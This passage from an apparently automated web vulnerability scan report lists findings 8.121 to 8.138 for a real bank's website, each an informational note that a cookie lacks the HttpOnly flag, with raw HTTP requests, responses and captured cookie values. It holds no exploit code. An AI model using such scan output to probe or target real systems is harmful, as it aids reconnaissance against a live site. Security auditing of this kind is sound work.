Date: Mon, 16 May 2011 15:20:37 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 6038


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link
...[SNIP]...
8.121. http://www.regions.com/personal_banking/get_started_installmentloan.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/get_started_installmentloan.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/get_started_installmentloan.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555465061:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5892


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link
...[SNIP]...
8.122. http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/get_started_lifegreen_checking.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/get_started_lifegreen_checking.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 6165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link
...[SNIP]...
8.123. http://www.regions.com/personal_banking/loans_credit.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/loans_credit.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/loans_credit.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/email_starting_net.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555433792:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:32 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 21828


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.124. http://www.regions.com/personal_banking/online_banking_help.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/online_banking_help.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/online_banking_help.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555382886:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:19:43 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 21562


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.125. http://www.regions.com/personal_banking/online_security.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/online_security.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/online_security.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555412882:ss=1305555382886; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:20:18 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 22388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.126. http://www.regions.com/personal_banking/open_account.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /personal_banking/open_account.rf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/open_account.rf HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/open_account.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555438131:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:17:19 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 27115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
8.127. http://www.regions.com/virtualMedia/img1213.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img1213.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img1213.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 576
Content-Type: image/gif
Last-Modified: Wed, 08 Oct 2008 15:00:23 GMT
Accept-Ranges: bytes
ETag: "304ced965629c91:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:29 GMT

GIF89ap...........xa..........V...m.#...........gx.4..E...8W....V............................................!.......,....p.......#.di.h..l..Q,.tm.x..|O?..pH,...r.,....t...... ..@...80+. .AX.!. .Y.P.
...[SNIP]...
8.128. http://www.regions.com/virtualMedia/img2020.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img2020.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2020.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/open_account.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 504
Content-Type: image/gif
Last-Modified: Mon, 11 Jan 2010 16:27:14 GMT
Accept-Ranges: bytes
ETag: "107312efda92ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:18 GMT

GIF89aW........V.....g...a.............xx.4...m.#.....E8W.......V............................................!.......,....W.......#.di.h.....p,.tm.xN;......',....r.......y.. .....f_..!.%.....pN..W.v..
...[SNIP]...
8.129. http://www.regions.com/virtualMedia/img2027.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img2027.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2027.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 2300
Content-Type: image/gif
Last-Modified: Tue, 12 Jan 2010 19:30:31 GMT
Accept-Ranges: bytes
ETag: "10d07ab4bd93ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:28 GMT

GIF89a................ppp......VVV.......U.DDD........Y.w3...yyy....`...............D....l"...iii......fff...!.......,............'.di.h..l..p,..bC.w...}..M .*.#....9........;./($....F....h........oT.
...[SNIP]...
8.130. http://www.regions.com/virtualMedia/img2028.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img2028.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2028.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 77
Content-Type: image/gif
Last-Modified: Tue, 12 Jan 2010 19:36:06 GMT
Accept-Ranges: bytes
ETag: "f02aff7bbe93ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:28 GMT

GIF89a    .............i....!.......,....    .........1-;.....n..#.4b.F"x.........;
8.131. http://www.regions.com/virtualMedia/img243.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img243.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img243.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_cds.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886; WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 411
Content-Type: image/gif
Last-Modified: Mon, 30 Apr 2007 18:26:29 GMT
Accept-Ranges: bytes
ETag: "0dc812558bc71:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:36 GMT

GIF89a?..................j. ...`..u.0..P..`.....p...~......@9V... ...U......................................!.......,....?......`$.di.h..M4.p,.tm.3..|....p....H.qv.H
..A!.8^...!.v....1.O..0.{..f..C0
...[SNIP]...
8.132. http://www.regions.com/virtualMedia/img422.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img422.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img422.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/open_account.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555439504:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 490
Content-Type: image/gif
Last-Modified: Tue, 24 Jul 2007 15:32:21 GMT
Accept-Ranges: bytes
ETag: "a044c1d37cec71:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:18 GMT

GIF89aZ..............f..w`...........w.3...l.".....U..D...8W....U............................................!.......,....Z.......#.di.h....8Q,.tm.x............H\1.l
...d .X!.F.q.....62........1...#bH
...[SNIP]...
8.133. http://www.regions.com/virtualMedia/img506.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img506.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img506.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555448118:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 4606
Content-Type: image/gif
Last-Modified: Wed, 26 Sep 2007 18:49:52 GMT
Accept-Ranges: bytes
ETag: "5032cc56e0c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:29 GMT

GIF89a..<.........(...f..T..........Ir.&..K............Y........T...................y..i................................W...........`.............................................[........O..........    .
...[SNIP]...
8.134. http://www.regions.com/virtualMedia/img537.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img537.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img537.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/email_starting_net.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555433792:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 60
Content-Type: image/gif
Last-Modified: Thu, 04 Oct 2007 13:16:53 GMT
Accept-Ranges: bytes
ETag: "f0bc93d4886c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:14 GMT

GIF89a..    .....f..........!.......,......    ........-..49v.).;
8.135. http://www.regions.com/virtualMedia/img563.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img563.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img563.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R1749179552; path=/
Set-Cookie: www.regions.com-http=R1402696235; path=/
Content-Length: 532
Content-Type: image/gif
Last-Modified: Tue, 16 Oct 2007 11:59:15 GMT
Accept-Ranges: bytes
ETag: "903819f9ebfc81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:24:05 GMT

GIF89a`........V.....x...a..x.4......m.#..g...........E8W.......V............................................!.......,....`.......#.di.h..lkFp,.tm.x.......p........l:...t......d.]...A..5.`......a..`;.
...[SNIP]...
8.136. http://www.regions.com/virtualMedia/img588.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img588.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img588.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/email_starting_net.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555433792:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 1168
Content-Type: image/gif
Last-Modified: Wed, 17 Oct 2007 20:22:13 GMT
Accept-Ranges: bytes
ETag: "20183067fb10c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:13 GMT

GIF89a.........@`..u.0......j. ........`.....P....f...p......U...............................................!.......,...........`$.di.h..l..p,.tm.x..|....pH,....r.l:...tJ......Ar@._n..    ....!...../!2.
...[SNIP]...
8.137. http://www.regions.com/virtualMedia/img828.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualMedia/img828.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img828.gif HTTP/1.1
Host: www.regions.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/email_starting_net.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTPS=R492750743; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555433792:ss=1305555382886

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R825062118; path=/
Content-Length: 1201
Content-Type: image/gif
Last-Modified: Mon, 28 Jan 2008 17:02:22 GMT
Accept-Ranges: bytes
ETag: "60eec48ccf61c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:14 GMT

GIF89a7.........`..u.0..p...j. ........P.f...`...........@...U...............................................!.......,....7......`$.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...    ..@..... 5 "...A.".t@..
...[SNIP]...
8.138. http://www.regions.com/virtualmedia/img240.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /virtualmedia/img240.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualmedia/img240.gif HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
